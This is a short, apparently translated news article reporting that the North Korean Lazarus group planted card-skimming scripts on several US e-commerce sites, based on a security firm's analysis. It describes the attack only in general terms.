October 24, 2020

North Korean hacker Lazarus hijacked e-commerce websites to steal credit card

3 min read

Lazarus Group is one of the most notorious hacker groups in the world at present because Lazarus has been active frequently and concocted many cases of cyber attacks over the years.

Among them, the WannaCry ransomware that users are familiar with was caused by Lazarus. The theft cases of Bangladesh National Bank and Taiwan Far East Bank were also related to Lazarus.

Security agencies have confirmed that Lazarus is an official hacker group controlled by North Korea. Unlike ordinary hacker groups, Lazarus has some special tasks.

The main purpose of hacker groups usually supported by the state is to quietly steal intelligence data, and Lazarus Group is dubbed as the North Korean foreign exchange group.

Because Lazarus often launches attacks for the purpose of stealing money, such as theft of banks and attacks on South Korean virtual currency exchanges for the purpose of making money.

According to an analysis report released by security company SanSec, the company found malicious scripts that Lazarus quietly implanted on some popular e-commerce websites in the US stores.

This type of attack is commonly referred to as webpage predatory or Magecart attacks, and its main purpose is to steal the credit card details filled in by malicious scripts.

The usage rate of credit cards abroad is very high. When paying online, users only need to fill in the credit card number, CVV2 security code, name, and expiration date to pay.

The payment link does not require passwords or SMS verification codes, so many attackers have targeted e-commerce websites to steal user card information. The MageCart attacks actually steal user card information through malicious scripts.

Lazarus generates a false credit card information filling box on the webpage through a malicious script to induce the user to fill it out. This kind of information box will appear when the user completes the purchase and jumps to the payment page on the e-commerce website. It is normal for payment to appear in this type of information box, and all users will not doubt it.

However, after the user enters the credit card information, such information will also be sent to the controller’s server, and then the controller can use the information to steal the user’s card.

After analysis, the security company found that the script code used by the hackers had the same homology with Lazarus, and after tracking it was determined to be the infamous Lazarus group.

The hacked e-commerce website is a very well-known Claire’s, Wongs Jewellers, Focus Camera, Paper Source, Jit Truck Parts, CBD Armour, Microbattery, and Realchems chain store. At present, it is impossible to predict how many users’ credit card information has been stolen.

It is a little difficult to generate a fake payment information frame on the payment page purely by the front end. Usually, such attacks directly tamper on the website server.

The security company speculates that Lazarus may have used phishing attacks to steal Claire’s employee credentials and log in to the server to install malicious scripts.

However, this is just speculation and cannot be confirmed, but the security company confirmed that hackers hacked into the server, so the number of affected users may be very large.

After SanSec contacted the company, its operation and maintenance personnel have removed the malicious script, but the stolen credit card user may next need to contact the bank to seal the card and change the card.

Via: bleepingcomputer